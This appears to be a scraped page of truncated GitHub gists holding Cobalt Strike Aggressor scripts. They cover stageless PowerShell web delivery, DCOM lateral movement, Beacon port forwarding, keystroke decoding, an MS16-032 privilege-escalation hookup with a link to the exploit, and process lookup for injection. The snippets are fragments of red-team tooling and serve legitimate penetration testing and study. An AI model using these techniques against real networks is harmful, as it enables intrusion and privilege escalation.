This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Scripted Web Delivery (Stageless) | |
# | |
# This script demonstrates some of the new APIs in Cobalt Strike 3.7. | |
# setup our stageless PowerShell Web Delivery attack | |
sub setup_attack { | |
local('%options $script $url $arch'); | |
%options = $3; | |
# get the arch right. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Lateral Movement alias | |
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ | |
# register help for our alias | |
beacon_command_register("com-exec", "lateral movement with DCOM", | |
"Synopsis: com-exec [target] [listener]\n\n" . | |
"Run a payload on a target via DCOM MMC20.Application Object"); | |
# here's our alias to collect our arguments | |
alias com-exec { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# port foreward alias in Beacon and SSH | |
# | |
# pull common code into a function | |
sub _portfwd { | |
if ($2 eq "stop") { | |
btask($1, "Tasked session to stop forward to $3"); | |
call("beacons.pivot_stop_port", $null, $3); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# convert comma separated keystroke values into a string. | |
sub toString { | |
local('@temp'); | |
@temp = split(",", $1); | |
shift(@temp); | |
return join("", map({ | |
return chr(parseNumber($1, 16, 10)); | |
}, @temp)); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Quick script to integrate ms16-032 attack into Cobalt Strike's Beacon | |
# | |
# 0. the &beacon_host_script function was added in Cobalt Strike 3.4 (you need CS 3.4 or later) | |
# 1. grab MS16-032.ps1 | |
# https://gist.githubusercontent.com/benichmt1/af52401c7f2d6984dea6ba60b44aa1aa/raw/bc6f579e694fc9a752e1a1dd95886c464f575ee7/MS16-032.ps1 | |
# 2. store it with this script | |
# 3. Use 'ms16-032 "listener name"' or 'ms16-032' from Beacon to run this attack | |
# logic to run this particular attack | |
sub exploit { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# host a PowerShell script on a one-off web server via Beacon. | |
# | |
# Why? Generate one-liners for length constrained command execution opportunities | |
# | |
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate! | |
# if there's interest in this capability, I can build an official API for it. | |
import common.*; | |
import beacon.*; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# demonstrate an example of inversion-of-control with Aggressor Script | |
# | |
# co-routine, | |
sub bot { | |
# run pwd and get the output. | |
bpwd($bid); | |
when("beacon_output_alt", $this); | |
yield; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getanypid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq $proc) { | |
# $1 is our Beacon ID, $pid is the PID of $proc | |
[$callback: $1, $proc, $pid]; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Aggressor Script means to parse/use environment vars in a Beacon session. | |
# | |
global('%bvars'); | |
# request environment variables for every new Beacon that comes in. | |
on beacon_initial { | |
# ideally, we'd have a bshell that could take callbacks. We don't have | |
# this yet. Eventually though, we will. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# getexplorerpid($bid, &callback); | |
sub getexplorerpid { | |
bps($1, lambda({ | |
local('$pid $name $entry'); | |
foreach $entry (split("\n", $2)) { | |
($name, $pid) = split("\\s+", $entry); | |
if ($name eq "explorer.exe") { | |
# $1 is our Beacon ID, $pid is the PID of explorer.exe | |
[$callback: $1, $pid]; | |
} |